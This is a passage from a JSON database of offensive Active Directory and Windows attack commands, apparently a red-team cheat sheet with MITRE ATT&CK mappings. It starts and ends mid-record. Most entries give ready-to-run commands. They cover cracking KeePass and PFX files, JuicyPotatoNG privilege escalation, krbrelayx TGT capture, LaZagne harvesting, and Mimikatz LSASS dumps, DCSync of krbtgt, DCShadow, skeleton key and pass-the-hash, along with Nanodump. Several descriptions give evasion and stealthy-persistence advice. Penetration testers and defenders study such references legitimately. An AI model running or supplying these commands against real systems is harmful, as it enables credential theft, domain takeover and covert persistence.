   1974     "description": "KeePass databases (.kdbx) looted from a share or a compromised host are frequent sources of privileged credentials. John the Ripper's keepass2john helper converts the database master-key parameters into a crackable hash, which john then attacks with a wordlist. It handles both password-only and keyfile-protected databases (pass the keyfile with -k). Fully offline; a recovered master password opens every secret in the vault.\n\nCommand Reference:\n\n\tKeePass DB: Database.kdbx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt",
   1975     "mitre": [
   1976       "T1555.005"
   1977     ],
   1978     "requires": [
   1979       "No_Creds"
   1980     ],
   1981     "references": [
   1982       "https://github.com/openwall/john",
   1983       "https://hashcat.net/wiki/doku.php?id=example_hashes",
   1984       "https://attack.mitre.org/techniques/T1555/005/"
   1985     ],
   1986     "added": true
   1987   },
   1988   {
   1989     "id": "wadcoms:John-pfx2john",
   1990     "toolId": "wadcoms:John",
   1991     "toolName": "John",
   1992     "name": "John-pfx2john",
   1993     "source": "DAEMON",
   1994     "platform": [
   1995       "Linux",
   1996       "ActiveDirectory",
   1997       "Windows"
   1998     ],
   1999     "capability": [
   2000       "Credential Access"
   2001     ],
   2002     "nativeCategory": [
   2003       "Credential Access"
   2004     ],
   2005     "command": "# extract the crackable hash from the .pfx\npfx2john cert.pfx > hashes.txt\n\n# crack the passphrase (john auto-detects the pfx format)\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt",
   2006     "description": "A password-protected PKCS#12 certificate store (.pfx / .p12) recovered during collection can be opened offline. John the Ripper's pfx2john helper extracts the encryption parameters into a crackable hash, which john then brute-forces against a wordlist. Recovering the passphrase unlocks the private key and certificate, which can be used for PKINIT/Schannel authentication (e.g. via certipy or Rubeus). Runs entirely offline with no target interaction.\n\nCommand Reference:\n\n\tPFX File: cert.pfx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt",
   2007     "mitre": [
   2008       "T1110.002"
   2009     ],
   2010     "requires": [
   2011       "No_Creds"
   2012     ],
   2013     "services": [
   2014       "ADCS"
   2015     ],
   2016     "references": [
   2017       "https://github.com/openwall/john",
   2018       "https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate",
   2019       "https://attack.mitre.org/techniques/T1110/002/"
   2020     ],
   2021     "added": true
   2022   },
   2023   {
   2024     "id": "wadcoms:JuicyPotatoNG-SeImpersonate",
   2025     "toolId": "wadcoms:JuicyPotatoNG",
   2026     "toolName": "JuicyPotatoNG",
   2027     "name": "JuicyPotatoNG-SeImpersonate",
   2028     "source": "DAEMON",
   2029     "platform": [
   2030       "Windows",
   2031       "ActiveDirectory"
   2032     ],
   2033     "capability": [
   2034       "Privilege Escalation",
   2035       "Execution"
   2036     ],
   2037     "nativeCategory": [
   2038       "PrivEsc",
   2039       "Exploitation"
   2040     ],
   2041     "command": "# -t * tries both token-creation APIs, -l sets the local COM server port\nJuicyPotatoNG.exe -t * -p \"C:\\Windows\\System32\\cmd.exe\" -a \"/c whoami\" -l 9999",
   2042     "description": "JuicyPotatoNG revives the JuicyPotato DCOM abuse against modern Windows by using a specific CLSID and a local COM server on a non-default port to coerce a SYSTEM authentication, then impersonates the token. The -t flag selects the token API: 't' uses CreateProcessWithTokenW (needs SeImpersonatePrivilege), 'u' uses CreateProcessAsUserW (needs SeAssignPrimaryTokenPrivilege), and '*' tries both. It works on Windows 10 / Server 2019 and later where classic JuicyPotato was blocked. Requires SeImpersonate or SeAssignPrimaryToken on the service account.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tCOM listen port: 9999",
   2043     "mitre": [],
   2044     "requires": [
   2045       "Shell"
   2046     ],
   2047     "services": [
   2048       "DCOM"
   2049     ],
   2050     "references": [
   2051       "https://github.com/antonioCoco/JuicyPotatoNG",
   2052       "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato"
   2053     ],
   2054     "added": true
   2055   },
   2056   {
   2057     "id": "wadcoms:Krbrelayx-Unconstrained-TGT",
   2058     "toolId": "wadcoms:Krbrelayx",
   2059     "toolName": "Krbrelayx",
   2060     "name": "Krbrelayx-Unconstrained-TGT",
   2061     "source": "DAEMON",
   2062     "platform": [
   2063       "Linux",
   2064       "ActiveDirectory",
   2065       "Windows"
   2066     ],
   2067     "capability": [
   2068       "Credential Access",
   2069       "Privilege Escalation",
   2070       "Execution"
   2071     ],
   2072     "nativeCategory": [
   2073       "Credential Access",
   2074       "PrivEsc",
   2075       "Exploitation"
   2076     ],
   2077     "command": "# Export mode: capture forwarded TGTs using the unconstrained account's key\npython3 krbrelayx.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92\n# Then coerce dc.test.local to authenticate (PetitPotam/printerbug) to drop a TGT ccache",
   2078     "description": "krbrelayx.py by dirkjanm abuses Kerberos unconstrained delegation. When you control an account or computer configured with unconstrained delegation, any principal that authenticates to it via Kerberos forwards a usable TGT inside the ticket. Running krbrelayx.py with the account's key (AES key or NT hash) and no relay target puts it in export mode: it starts an SMB/HTTP listener, decrypts incoming Kerberos service tickets, and writes the embedded TGTs to ccache files on disk. Coercing a Domain Controller (via PetitPotam or the printer bug) to authenticate yields the DC's TGT, which can then be used with secretsdump.py for a full DCSync. This is the Kerberos analogue to NTLM relaying and bypasses SMB signing.\n\nCommand Reference:\n\n\tDelegation account AES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain Controller IP: 10.10.10.1\n\n\tOutput ccache: out.ccache",
   2079     "mitre": [],
   2080     "requires": [
   2081       "AES_Key"
   2082     ],
   2083     "services": [
   2084       "Kerberos"
   2085     ],
   2086     "references": [
   2087       "https://github.com/dirkjanm/krbrelayx",
   2088       "https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/",
   2089       "https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained"
   2090     ],
   2091     "added": true
   2092   },
   2093   {
   2094     "id": "wadcoms:LaZagne-All",
   2095     "toolId": "wadcoms:LaZagne",
   2096     "toolName": "LaZagne",
   2097     "name": "LaZagne-All",
   2098     "source": "DAEMON",
   2099     "platform": [
   2100       "Windows",
   2101       "ActiveDirectory"
   2102     ],
   2103     "capability": [
   2104       "Credential Access",
   2105       "Collection"
   2106     ],
   2107     "nativeCategory": [
   2108       "Credential Access",
   2109       "Collection"
   2110     ],
   2111     "command": "laZagne.exe all",
   2112     "description": "LaZagne is an open-source credential harvester that walks dozens of local software modules - browsers, mail clients, Wi-Fi, LSA secrets, credential vaults, chats, databases, and more - and recovers stored passwords in one pass. The 'all' argument runs every module; results can be written to file with -oN (json), -oA (all formats), or -oJ. Some modules (LSA secrets, Wi-Fi) need administrator rights while browser and app creds are readable in the user's own context, making it a fast triage tool after initial access.\n\nCommand Reference:\n\n\tTarget host: local (current user context)",
   2113     "mitre": [
   2114       "T1555"
   2115     ],
   2116     "requires": [
   2117       "Shell"
   2118     ],
   2119     "services": [
   2120       "NTLM"
   2121     ],
   2122     "references": [
   2123       "https://github.com/AlessandroZ/LaZagne",
   2124       "https://book.hacktricks.xyz/windows-hardening/stealing-credentials",
   2125       "https://attack.mitre.org/techniques/T1555/"
   2126     ],
   2127     "added": true
   2128   },
   2129   {
   2130     "id": "wadcoms:ldapdomaindump-Enum",
   2131     "toolId": "wadcoms:ldapdomaindump",
   2132     "toolName": "ldapdomaindump",
   2133     "name": "ldapdomaindump-Enum",
   2134     "source": "DAEMON",
   2135     "platform": [
   2136       "Linux",
   2137       "ActiveDirectory",
   2138       "Windows"
   2139     ],
   2140     "capability": [
   2141       "Enumeration",
   2142       "Discovery"
   2143     ],
   2144     "nativeCategory": [
   2145       "Enumeration",
   2146       "Discovery"
   2147     ],
   2148     "command": "# Dump all domain objects (users, groups, computers, policy, trusts) to HTML/JSON/greppable files\nldapdomaindump -u 'test.local\\john' -p password123 -o output_dir ldap://10.10.10.1",
   2149     "description": "ldapdomaindump (dirkjanm) authenticates to a Domain Controller over LDAP/LDAPS with any valid domain account and dumps the whole directory - users, groups, computers, domain policy, and trusts - into ready-to-read HTML tables plus machine-parsable JSON and greppable text. It is a fast first-pass inventory when you land your first set of credentials and want an offline overview of the domain before running heavier tooling. Output lands in the directory given with -o (default: current dir).\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1",
   2150     "mitre": [
   2151       "T1087.002"
   2152     ],
   2153     "requires": [
   2154       "Username",
   2155       "Password"
   2156     ],
   2157     "services": [
   2158       "LDAP"
   2159     ],
   2160     "references": [
   2161       "https://github.com/dirkjanm/ldapdomaindump",
   2162       "https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap",
   2163       "https://attack.mitre.org/techniques/T1087/002/"
   2164     ],
   2165     "added": true
   2166   },
   2167   {
   2168     "id": "wadcoms:ldapnomnom-UserEnum",
   2169     "toolId": "wadcoms:ldapnomnom",
   2170     "toolName": "ldapnomnom",
   2171     "name": "ldapnomnom-UserEnum",
   2172     "source": "DAEMON",
   2173     "platform": [
   2174       "Linux",
   2175       "Windows",
   2176       "ActiveDirectory"
   2177     ],
   2178     "capability": [
   2179       "Enumeration",
   2180       "Discovery"
   2181     ],
   2182     "nativeCategory": [
   2183       "Enumeration",
   2184       "Discovery"
   2185     ],
   2186     "command": "# Anonymous, lockout-free username validation via cLDAP LDAP Ping; DCs auto-discovered from DNS\nldapnomnom --input usernames.txt --output output.txt --dnsdomain test.local",
   2187     "description": "ldapnomnom (lkarlslund) anonymously bruteforces valid Active Directory usernames at very high speed by abusing cLDAP LDAP Ping (Netlogon) requests against Domain Controllers. Because a valid name produces a different response than an invalid one, existence can be confirmed without authenticating - so there are no failed logons and no account lockouts, making it far quieter than Kerberos pre-auth enumeration. Feed it a wordlist with --input and it writes the valid names to --output; --dnsdomain lets it auto-discover DCs via DNS. Ideal for pre-credential recon.\n\nCommand Reference:\n\n\tNo_Creds\n\tUsername wordlist: usernames.txt\n\tOutput file: output.txt\n\tDomain: test.local",
   2188     "mitre": [
   2189       "T1087.002"
   2190     ],
   2191     "requires": [
   2192       "No_Creds"
   2193     ],
   2194     "services": [
   2195       "LDAP",
   2196       "Kerberos"
   2197     ],
   2198     "references": [
   2199       "https://github.com/lkarlslund/ldapnomnom",
   2200       "https://attack.mitre.org/techniques/T1087/002/"
   2201     ],
   2202     "added": true
   2203   },
   2204   {
   2205     "id": "wadcoms:ldeep-Enum-All",
   2206     "toolId": "wadcoms:ldeep",
   2207     "toolName": "ldeep",
   2208     "name": "ldeep-Enum-All",
   2209     "source": "DAEMON",
   2210     "platform": [
   2211       "Linux",
   2212       "ActiveDirectory",
   2213       "Windows"
   2214     ],
   2215     "capability": [
   2216       "Enumeration",
   2217       "Discovery"
   2218     ],
   2219     "nativeCategory": [
   2220       "Enumeration",
   2221       "Discovery"
   2222     ],
   2223     "command": "# Collect everything into files prefixed 'output' (output_users.json, output_groups.json, ...)\nldeep ldap -u john -p password123 -d test.local -s ldap://10.10.10.1 all output",
   2224     "description": "ldeep is an in-depth LDAP enumeration utility that ships dozens of focused subcommands (users, groups, memberships, trusts, GPOs, delegation, PSOs, and more) under its ldap mode. The all subcommand collects computers, domain_policy, zones, gpo, groups, ou, users, trusts and pso in one pass and writes each to files prefixed with the base name you supply. Run it with any valid domain account when you want a complete, structured snapshot of the directory to grep offline. Individual subcommands (e.g. ldeep ldap ... trusts) can be run afterward for targeted queries.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1",
   2225     "mitre": [
   2226       "T1087.002"
   2227     ],
   2228     "requires": [
   2229       "Username",
   2230       "Password"
   2231     ],
   2232     "services": [
   2233       "LDAP"
   2234     ],
   2235     "references": [
   2236       "https://github.com/franc-pentest/ldeep",
   2237       "https://www.hackingarticles.in/active-directory-enumeration-ldeep/",
   2238       "https://attack.mitre.org/techniques/T1087/002/"
   2239     ],
   2240     "added": true
   2241   },
   2242   {
   2243     "id": "wadcoms:MANSPIDER-Content-Search",
   2244     "toolId": "wadcoms:MANSPIDER",
   2245     "toolName": "MANSPIDER",
   2246     "name": "MANSPIDER-Content-Search",
   2247     "source": "DAEMON",
   2248     "platform": [
   2249       "Linux",
   2250       "ActiveDirectory",
   2251       "Windows"
   2252     ],
   2253     "capability": [
   2254       "Collection",
   2255       "Credential Access",
   2256       "Discovery"
   2257     ],
   2258     "nativeCategory": [
   2259       "Collection",
   2260       "Credential Access",
   2261       "Discovery"
   2262     ],
   2263     "command": "# Search file CONTENT for 'password' across all readable shares on a host\nmanspider 10.10.10.1 -c password -u john -p password123 -d test.local\n\n# Hunt spreadsheets/office docs mentioning credentials, content-only (no download)\nmanspider 10.10.10.1 -c passw creds -e xlsx docx csv -n -u john -p password123 -d test.local",
   2264     "description": "MANSPIDER (Black Lantern Security) crawls readable SMB shares across one or many hosts and greps inside the files it finds, so it catches secrets buried in documents, spreadsheets and text files rather than just interesting filenames. -c/--content takes one or more regexes matched against extracted file contents (it can parse PDF, Office and other formats), while -f/--filenames and -e/--extensions narrow the crawl by name or type. It downloads matching files to the loot directory by default; add -n/--no-download for a quieter content-only sweep. Useful for wide domain-scale secret hunting once you hold any domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123",
   2265     "mitre": [],
   2266     "requires": [
   2267       "Username",
   2268       "Password"
   2269     ],
   2270     "services": [
   2271       "SMB"
   2272     ],
   2273     "references": [
   2274       "https://github.com/blacklanternsecurity/MANSPIDER",
   2275       "https://www.blacklanternsecurity.com/2020-11-04-MANSPIDER/"
   2276     ],
   2277     "added": true
   2278   },
   2279   {
   2280     "id": "wadcoms:Mimikatz-Crypto-ExportCerts",
   2281     "toolId": "wadcoms:Mimikatz",
   2282     "toolName": "Mimikatz",
   2283     "name": "Mimikatz-Crypto-ExportCerts",
   2284     "source": "DAEMON",
   2285     "platform": [
   2286       "Windows",
   2287       "ActiveDirectory"
   2288     ],
   2289     "capability": [
   2290       "Credential Access",
   2291       "Collection"
   2292     ],
   2293     "nativeCategory": [
   2294       "Credential Access",
   2295       "Collection"
   2296     ],
   2297     "command": "mimikatz.exe \"crypto::capi\" \"privilege::debug\" \"crypto::cng\" \"crypto::certificates /systemstore:LOCAL_MACHINE /store:My /export\" exit",
   2298     "description": "Mimikatz crypto::certificates lists and, with /export, extracts certificates and their private keys from a CryptoAPI store to .pfx/.der files, even when the private key was marked non-exportable. crypto::capi (and crypto::cng for CNG keys) patches the key-provider in memory first so the non-exportable flag is bypassed. Point /systemstore at LOCAL_MACHINE for machine certs or CURRENT_USER for user certs; exported .pfx files enable certificate-based (PKINIT) authentication as that principal.\n\nCommand Reference:\n\n\tStore: LOCAL_MACHINE\\My\n\n\tExport password: mimikatz (default for exported .pfx)",
   2299     "mitre": [
   2300       "T1552.004"
   2301     ],
   2302     "requires": [
   2303       "Shell"
   2304     ],
   2305     "services": [
   2306       "ADCS"
   2307     ],
   2308     "references": [
   2309       "https://github.com/gentilkiwi/mimikatz",
   2310       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates",
   2311       "https://attack.mitre.org/techniques/T1552/004/"
   2312     ],
   2313     "added": true
   2314   },
   2315   {
   2316     "id": "wadcoms:Mimikatz-DCShadow",
   2317     "toolId": "wadcoms:Mimikatz",
   2318     "toolName": "Mimikatz",
   2319     "name": "Mimikatz-DCShadow",
   2320     "source": "DAEMON",
   2321     "platform": [
   2322       "Windows",
   2323       "ActiveDirectory"
   2324     ],
   2325     "capability": [
   2326       "Persistence",
   2327       "Defense Evasion"
   2328     ],
   2329     "nativeCategory": [
   2330       "Persistence",
   2331       "Defense Evasion"
   2332     ],
   2333     "command": "# Instance 1 (SYSTEM) - stage the change\nmimikatz.exe \"!+\" \"!processtoken\" \"lsadump::dcshadow /object:john /attribute:primaryGroupID /value:512\"\n\n# Instance 2 (Domain Admin) - push the replication\nmimikatz.exe \"lsadump::dcshadow /push\" exit",
   2334     "description": "Mimikatz lsadump::dcshadow temporarily registers a rogue domain controller and pushes attacker-chosen attribute changes into the directory through legitimate replication (MS-DRSR), which sidesteps normal object-modification auditing. It runs as two cooperating instances: an elevated SYSTEM instance stages the change with /object, /attribute and /value, and a second instance holding Domain Admin (or the required replication rights) triggers the push with /push. Use it for stealthy persistence such as writing a primaryGroupID or SIDHistory.\n\nCommand Reference:\n\n\tTarget object: john\n\n\tAttribute: primaryGroupID = 512 (Domain Admins)",
   2335     "mitre": [],
   2336     "requires": [
   2337       "Shell"
   2338     ],
   2339     "services": [
   2340       "LDAP",
   2341       "RPC"
   2342     ],
   2343     "references": [
   2344       "https://github.com/gentilkiwi/mimikatz",
   2345       "https://www.dcshadow.com/",
   2346       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcshadow"
   2347     ],
   2348     "added": true
   2349   },
   2350   {
   2351     "id": "wadcoms:Mimikatz-DCSync-Krbtgt",
   2352     "toolId": "wadcoms:Mimikatz",
   2353     "toolName": "Mimikatz",
   2354     "name": "Mimikatz-DCSync-Krbtgt",
   2355     "source": "DAEMON",
   2356     "platform": [
   2357       "Windows",
   2358       "ActiveDirectory"
   2359     ],
   2360     "capability": [
   2361       "Credential Access",
   2362       "Execution"
   2363     ],
   2364     "nativeCategory": [
   2365       "Credential Access",
   2366       "Exploitation"
   2367     ],
   2368     "command": "mimikatz.exe \"privilege::debug\" \"lsadump::dcsync /domain:test.local /user:krbtgt\" exit",
   2369     "description": "Mimikatz lsadump::dcsync impersonates a domain controller and uses the MS-DRSR replication protocol (GetNCChanges) to pull the password data of a chosen account from a live DC, without ever running code on that DC or touching NTDS.dit on disk. Targeting krbtgt yields the KDC key needed to forge Golden Tickets. It requires an account with the Replicating Directory Changes / Replicating Directory Changes All rights (Domain Admins, Enterprise Admins, or a delegated principal).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tTarget user: krbtgt",
   2370     "mitre": [
   2371       "T1003.006"
   2372     ],
   2373     "requires": [
   2374       "Shell"
   2375     ],
   2376     "services": [
   2377       "Kerberos",
   2378       "LDAP"
   2379     ],
   2380     "references": [
   2381       "https://github.com/gentilkiwi/mimikatz",
   2382       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync",
   2383       "https://attack.mitre.org/techniques/T1003/006/"
   2384     ],
   2385     "added": true
   2386   },
   2387   {
   2388     "id": "wadcoms:Mimikatz-DPAPI-Masterkey-Cred",
   2389     "toolId": "wadcoms:Mimikatz",
   2390     "toolName": "Mimikatz",
   2391     "name": "Mimikatz-DPAPI-Masterkey-Cred",
   2392     "source": "DAEMON",
   2393     "platform": [
   2394       "Windows",
   2395       "ActiveDirectory"
   2396     ],
   2397     "capability": [
   2398       "Credential Access"
   2399     ],
   2400     "nativeCategory": [
   2401       "Credential Access"
   2402     ],
   2403     "command": "mimikatz.exe \"dpapi::masterkey /in:\\\"%appdata%\\Microsoft\\Protect\\S-1-5-21-1339291983-1349129144-367733775-1001\\<GUID>\\\" /sid:S-1-5-21-1339291983-1349129144-367733775-1001 /password:password123\" \"dpapi::cred /in:\\\"%appdata%\\Microsoft\\Credentials\\<GUID>\\\"\" exit",
   2404     "description": "Mimikatz dpapi::masterkey decrypts a user's DPAPI master key from the Protect folder using their password (and SID), and dpapi::cred then uses that cached master key to decrypt a Credential blob into its stored plaintext secret. DPAPI protects saved RDP, browser, scheduled-task, and Credential Manager secrets, so this chain recovers them offline from copied files. If you lack the user's password, dpapi::masterkey /rpc asks the domain controller to decrypt the key with the domain DPAPI backup key.\n\nCommand Reference:\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tPassword: password123",
   2405     "mitre": [
   2406       "T1555.004"
   2407     ],
   2408     "requires": [
   2409       "Shell",
   2410       "Password"
   2411     ],
   2412     "services": [
   2413       "NTLM"
   2414     ],
   2415     "references": [
   2416       "https://github.com/gentilkiwi/mimikatz",
   2417       "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords",
   2418       "https://attack.mitre.org/techniques/T1555/004/"
   2419     ],
   2420     "added": true
   2421   },
   2422   {
   2423     "id": "wadcoms:Mimikatz-LogonPasswords",
   2424     "toolId": "wadcoms:Mimikatz",
   2425     "toolName": "Mimikatz",
   2426     "name": "Mimikatz-LogonPasswords",
   2427     "source": "DAEMON",
   2428     "platform": [
   2429       "Windows",
   2430       "ActiveDirectory"
   2431     ],
   2432     "capability": [
   2433       "Credential Access"
   2434     ],
   2435     "nativeCategory": [
   2436       "Credential Access"
   2437     ],
   2438     "command": "mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit",
   2439     "description": "Mimikatz sekurlsa::logonpasswords reads the authentication material cached in LSASS memory and reconstructs plaintext passwords, NT/LM hashes, and Kerberos keys for every interactive, service, and network logon session on the host. It requires local administrator rights and SeDebugPrivilege, which privilege::debug enables before touching LSASS. This is the classic loud credential dump; on hardened hosts (Credential Guard, PPL, or EDR hooking LSASS) it will fail or be caught, so prefer an offline minidump plus pypykatz when OPSEC matters.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tPrivilege: SeDebugPrivilege",
   2440     "mitre": [
   2441       "T1003.001"
   2442     ],
   2443     "requires": [
   2444       "Shell"
   2445     ],
   2446     "services": [
   2447       "NTLM",
   2448       "Kerberos"
   2449     ],
   2450     "references": [
   2451       "https://github.com/gentilkiwi/mimikatz",
   2452       "https://book.hacktricks.xyz/windows-hardening/stealing-credentials",
   2453       "https://attack.mitre.org/techniques/T1003/001/"
   2454     ],
   2455     "added": true
   2456   },
   2457   {
   2458     "id": "wadcoms:Mimikatz-LsadumpSAM",
   2459     "toolId": "wadcoms:Mimikatz",
   2460     "toolName": "Mimikatz",
   2461     "name": "Mimikatz-LsadumpSAM",
   2462     "source": "DAEMON",
   2463     "platform": [
   2464       "Windows",
   2465       "ActiveDirectory"
   2466     ],
   2467     "capability": [
   2468       "Credential Access"
   2469     ],
   2470     "nativeCategory": [
   2471       "Credential Access"
   2472     ],
   2473     "command": "mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::sam\" exit",
   2474     "description": "Mimikatz lsadump::sam decrypts the local SAM database using the boot key from the SYSTEM hive and dumps the NT hashes of all local accounts, including the local Administrator. Running it live requires SYSTEM-level access, so token::elevate is used to raise from an administrative shell to SYSTEM. The recovered local hashes are ideal for local pass-the-hash and for spotting password reuse across a fleet where the same local admin hash is shared.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SAM + SYSTEM)",
   2475     "mitre": [
   2476       "T1003.002"
   2477     ],
   2478     "requires": [
   2479       "Shell"
   2480     ],
   2481     "services": [
   2482       "NTLM"
   2483     ],
   2484     "references": [
   2485       "https://github.com/gentilkiwi/mimikatz",
   2486       "https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz",
   2487       "https://attack.mitre.org/techniques/T1003/002/"
   2488     ],
   2489     "added": true
   2490   },
   2491   {
   2492     "id": "wadcoms:Mimikatz-LsadumpSecrets",
   2493     "toolId": "wadcoms:Mimikatz",
   2494     "toolName": "Mimikatz",
   2495     "name": "Mimikatz-LsadumpSecrets",
   2496     "source": "DAEMON",
   2497     "platform": [
   2498       "Windows",
   2499       "ActiveDirectory"
   2500     ],
   2501     "capability": [
   2502       "Credential Access"
   2503     ],
   2504     "nativeCategory": [
   2505       "Credential Access"
   2506     ],
   2507     "command": "mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::secrets\" exit",
   2508     "description": "Mimikatz lsadump::secrets decrypts the LSA secrets stored under the SECURITY registry hive, exposing service account passwords, scheduled-task credentials, cached DPAPI machine keys, auto-logon passwords, and the machine account secret in cleartext. It needs SYSTEM rights, so token::elevate is chained after privilege::debug. LSA secrets frequently hand over a domain service account password that no other technique reveals.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SECURITY + SYSTEM)",
   2509     "mitre": [
   2510       "T1003.004"
   2511     ],
   2512     "requires": [
   2513       "Shell"
   2514     ],
   2515     "services": [
   2516       "NTLM"
   2517     ],
   2518     "references": [
   2519       "https://github.com/gentilkiwi/mimikatz",
   2520       "https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz",
   2521       "https://attack.mitre.org/techniques/T1003/004/"
   2522     ],
   2523     "added": true
   2524   },
   2525   {
   2526     "id": "wadcoms:Mimikatz-PassTheHash",
   2527     "toolId": "wadcoms:Mimikatz",
   2528     "toolName": "Mimikatz",
   2529     "name": "Mimikatz-PassTheHash",
   2530     "source": "DAEMON",
   2531     "platform": [
   2532       "Windows",
   2533       "ActiveDirectory"
   2534     ],
   2535     "capability": [
   2536       "Lateral Movement"
   2537     ],
   2538     "nativeCategory": [
   2539       "Lateral Movement"
   2540     ],
   2541     "command": "mimikatz.exe \"privilege::debug\" \"sekurlsa::pth /user:john /domain:test.local /ntlm:2a3de7fe356ee524cc9f3d579f2e0aa7 /run:cmd.exe\" exit",
   2542     "description": "Mimikatz sekurlsa::pth performs pass-the-hash by starting a new process whose logon session is seeded with a supplied NT hash (or AES key), letting network authentication proceed as the target user without knowing their password. The spawned process (here cmd.exe) can then reach SMB, WMI, or WinRM as john. It requires local administrator rights on the box you run it from because it patches the new process's LSASS session; use /aes256 instead of /ntlm for an overpass-the-hash that requests Kerberos tickets.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7",
   2543     "mitre": [
   2544       "T1550.002"
   2545     ],
   2546     "requires": [
   2547       "Shell",
   2548       "Hash"
   2549     ],
   2550     "services": [
   2551       "NTLM",
   2552       "SMB",
   2553       "Kerberos"
   2554     ],
   2555     "references": [
   2556       "https://github.com/gentilkiwi/mimikatz",
   2557       "https://book.hacktricks.xyz/windows-hardening/ntlm/pass-the-hash",
   2558       "https://attack.mitre.org/techniques/T1550/002/"
   2559     ],
   2560     "added": true
   2561   },
   2562   {
   2563     "id": "wadcoms:Mimikatz-PassTheTicket",
   2564     "toolId": "wadcoms:Mimikatz",
   2565     "toolName": "Mimikatz",
   2566     "name": "Mimikatz-PassTheTicket",
   2567     "source": "DAEMON",
   2568     "platform": [
   2569       "Windows",
   2570       "ActiveDirectory"
   2571     ],
   2572     "capability": [
   2573       "Lateral Movement"
   2574     ],
   2575     "nativeCategory": [
   2576       "Lateral Movement"
   2577     ],
   2578     "command": "mimikatz.exe \"kerberos::ptt ticket.kirbi\" exit",
   2579     "description": "Mimikatz kerberos::ptt injects a Kerberos ticket (.kirbi TGT or TGS) directly into the current logon session's ticket cache, so subsequent tools authenticate with it transparently. Unlike sekurlsa::pth it does not spawn a process or need administrator rights, since it only writes to the caller's own cache. Use it to replay a harvested or forged ticket for pass-the-ticket lateral movement, then verify with klist.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi",
   2580     "mitre": [
   2581       "T1550.003"
   2582     ],
   2583     "requires": [
   2584       "Shell",
   2585       "TGT"
   2586     ],
   2587     "services": [
   2588       "Kerberos"
   2589     ],
   2590     "references": [
   2591       "https://github.com/gentilkiwi/mimikatz",
   2592       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket",
   2593       "https://attack.mitre.org/techniques/T1550/003/"
   2594     ],
   2595     "added": true
   2596   },
   2597   {
   2598     "id": "wadcoms:Mimikatz-SkeletonKey",
   2599     "toolId": "wadcoms:Mimikatz",
   2600     "toolName": "Mimikatz",
   2601     "name": "Mimikatz-SkeletonKey",
   2602     "source": "DAEMON",
   2603     "platform": [
   2604       "Windows",
   2605       "ActiveDirectory"
   2606     ],
   2607     "capability": [
   2608       "Persistence"
   2609     ],
   2610     "nativeCategory": [
   2611       "Persistence"
   2612     ],
   2613     "command": "mimikatz.exe \"privilege::debug\" \"misc::skeleton\" exit",
   2614     "description": "Mimikatz misc::skeleton patches the LSASS process of a live domain controller in memory so that a master password (the hardcoded default 'mimikatz') is accepted for any domain account alongside each user's real password. It is a stealthy but volatile persistence primitive: the patch lives only in memory and is lost on DC reboot, and it downgrades some Kerberos encryption which detections watch for. It requires Domain Admin / SeDebugPrivilege on the DC and only works against DCs not running LSA as a protected process.\n\nCommand Reference:\n\n\tTarget: Domain Controller DC01 (dc.test.local)\n\n\tMaster password: mimikatz (built-in default)",
   2615     "mitre": [
   2616       "T1556.001"
   2617     ],
   2618     "requires": [
   2619       "Shell"
   2620     ],
   2621     "services": [
   2622       "Kerberos"
   2623     ],
   2624     "references": [
   2625       "https://github.com/gentilkiwi/mimikatz",
   2626       "https://adsecurity.org/?p=1275",
   2627       "https://attack.mitre.org/techniques/T1556/001/"
   2628     ],
   2629     "added": true
   2630   },
   2631   {
   2632     "id": "wadcoms:Nanodump-LSASS",
   2633     "toolId": "wadcoms:Nanodump",
   2634     "toolName": "Nanodump",
   2635     "name": "Nanodump-LSASS",
   2636     "source": "DAEMON",
   2637     "platform": [
   2638       "Windows",
   2639       "ActiveDirectory"
   2640     ],
   2641     "capability": [
   2642       "Credential Access",
   2643       "Defense Evasion"
   2644     ],
   2645     "nativeCategory": [
   2646       "Credential Access",
   2647       "Defense Evasion"
   2648     ],
   2649     "command": "nanodump.x64.exe --fork --valid --write C:\\Windows\\Temp\\lsass.dmp",
